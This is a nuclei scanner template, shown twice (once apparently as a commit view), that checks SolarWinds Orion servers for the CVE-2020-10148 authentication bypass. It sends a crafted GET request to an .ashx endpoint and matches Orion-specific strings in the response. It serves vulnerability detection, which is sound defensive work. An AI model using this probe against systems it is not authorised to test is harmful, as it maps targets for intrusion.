nuclei-templates/cves/CVE-2020-10148.yaml

id: cve-2020-10148

info:
  name: SolarWinds Orion API Auth Bypass Leads to RCE (SUPERNOVA)
  author: dwisiswant0
  severity: high
  description: |
    This template could allow to bypass authentication and execute API
    commands which may result in a compromise of the SolarWinds instance.

  # References:
  # - https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965
  # - https://kb.cert.org/vuls/id/843464

requests:
  - method: GET
    path:
      - "{{BaseURL}}/web.config.i18n.ashx"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "orionProxy"
          - "sw.web.compression"
          - "SolarWinds.Orion.Core."
        condition: or
        part: body
      - type: status
        status:
          - 200
:fire: Add CVE-2020-10148 2020-12-29 07:32:08 +00:00			`id: cve-2020-10148`

			`info:`
			`name: SolarWinds Orion API Auth Bypass Leads to RCE (SUPERNOVA)`
			`author: dwisiswant0`
			`severity: high`
			`description: \|`
			`This template could allow to bypass authentication and execute API`
			`commands which may result in a compromise of the SolarWinds instance.`

			`# References:`
			`# - https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965`
			`# - https://kb.cert.org/vuls/id/843464`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/web.config.i18n.ashx"`
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "orionProxy"`
			`- "sw.web.compression"`
			`- "SolarWinds.Orion.Core."`
			`condition: or`
			`part: body`
			`- type: status`
			`status:`
			`- 200`